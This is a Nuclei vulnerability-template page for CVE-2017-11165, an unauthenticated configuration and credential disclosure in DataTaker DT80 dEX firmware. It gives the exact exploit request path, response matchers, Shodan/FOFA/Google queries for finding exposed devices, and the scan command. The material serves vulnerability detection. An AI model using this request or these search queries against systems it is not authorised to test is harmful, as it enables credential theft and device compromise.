Skip to content
Nuclei Templates

DataTaker DT80 dEX 1.50.012 - Information Disclosure

ID: CVE-2017-11165

Severity: critical

Author: theabhinavgaur

Tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure

Description

Section titled “Description”

DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations.

YAML Source

Section titled “YAML Source”
id: CVE-2017-11165


info:
  name: DataTaker DT80 dEX 1.50.012 - Information Disclosure
  author: theabhinavgaur
  severity: critical
  description: |
    DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive data, potentially compromising the confidentiality of the system.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate the information disclosure vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/45094
    - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html
    - https://www.exploit-db.com/exploits/42313/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-11165
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-11165
    cwe-id: CWE-200
    epss-score: 0.94336
    epss-percentile: 0.99189
    cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: datataker
    product: dt80_dex_firmware
    shodan-query: http.title:"datataker"
    fofa-query: title="datataker"
    google-query: intitle:"datataker"
  tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure


http:
  - method: GET
    path:
      - "{{BaseURL}}/services/getFile.cmd?userfile=config.xml"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "COMMAND_SERVER"
          - "<loggerSettings>"
          - "config id=\"config"
        condition: and


      - type: word
        part: header
        words:
          - "text/xml"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502205b718bdb315770ee95f2814f82c3aff7a3ae651f7d3beeaa48f52c430a611910022100def70e1bd790674e76d533ab1be9ddfe849be6724263097748f443d3aac289a8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-11165.yaml"

View on Github